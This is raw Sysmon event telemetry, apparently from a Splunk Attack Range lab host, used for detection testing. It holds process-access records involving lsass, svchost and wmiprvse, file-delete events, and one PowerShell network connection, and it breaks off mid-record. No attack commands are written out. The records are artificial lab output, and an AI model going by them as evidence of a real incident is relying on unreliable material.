13:15:56.635{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.634{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.634{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.618{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.587{B81B27B7-4013-611D-1600-00000000C801}11964276C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.587{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.571{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.571{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08C-6140-7556-04000000C801}6812C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.556{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.556{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.556{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9B282C687489CB740DA68416D34EBC8,SHA256=36805986CF6CD020205BB033DEBD3DEBEB0A01A40C3D7DB9281A6BE9F4AE8635,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.272{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a3167e7.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:27.671{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50499-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:57.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D96C7E28F78E2C8BC5C9025911F5BED0,SHA256=99C59481901EE37C01BC4D55EB546DE53CA84357F6E76E08617859E4F4B78893,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:57.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC62B97FCD79B38478CD39495608C84D,SHA256=818F3558B2B8F54994625E66E898D15526CC98C550D2061EB4C4B8B0A6670739,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:57.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C2A5B2AEC8D09DA86594E6A3564F78D,SHA256=E004B4BED12689DC55A1D4C80B1B685514DAFBBBD5C68570837CE33942125ED0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:57.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A4241DDF9B4BAE6F9A388A780956034A,SHA256=D5A370E6161BE6E11C99E14C54FCCA548C40D79522183CDF56424FD29B8F9491,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:58.370{B81B27B7-4013-611D-1600-00000000C801}11965604C:\Windows\system32\svchost.exe{B81B27B7-A08E-6140-7756-04000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:58.370{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 